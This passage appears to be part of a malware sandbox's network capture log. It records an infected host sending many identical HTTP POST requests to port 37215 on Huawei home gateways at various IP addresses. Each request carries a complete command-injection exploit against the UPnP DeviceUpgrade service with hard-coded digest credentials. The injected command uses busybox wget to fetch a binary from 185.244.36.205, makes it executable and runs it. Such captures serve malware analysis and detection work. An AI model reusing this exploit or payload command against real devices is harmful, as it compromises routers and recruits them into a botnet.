                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1552192.168.2.1547092222.113.198.14637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.644560099 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1553192.168.2.1538664102.174.15.10237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.644598007 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1554192.168.2.1555260186.121.167.13337215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.644602060 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1555192.168.2.1533454190.199.34.15137215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.644633055 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1556192.168.2.1548654156.208.125.14637215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.644637108 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1557192.168.2.1549260102.130.237.7437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.644668102 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1558192.168.2.1532952190.205.20.3437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.644669056 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1559192.168.2.1542448197.9.95.7437215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.644687891 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1560192.168.2.1554880122.194.100.12837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.644716978 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1561192.168.2.1548520222.153.81.25237215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.644727945 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
                                              Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 38 35 2e 32 34 34 2e 33 36 2e 32 30 35 20 2d 6c 20 2f 74 6d 70 2f 78 78 74 65 61 20 2d 72 20 2f 68 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 78 78 74 65 61 3b 20 2f 74 6d [TRUNCATED]
                                              Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 185.244.36.205 -l /tmp/xxtea -r /hmips; /bin/busybox chmod 777 /tmp/xxtea; /tmp/xxtea huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              1562192.168.2.153347431.181.137.1837215
                                              TimestampBytes transferredDirectionData
                                              Jun 9, 2024 16:33:19.644752026 CEST822OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                              Connection: keep-alive
                                              Accept: */*
                                              Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                              Content-Length: 453
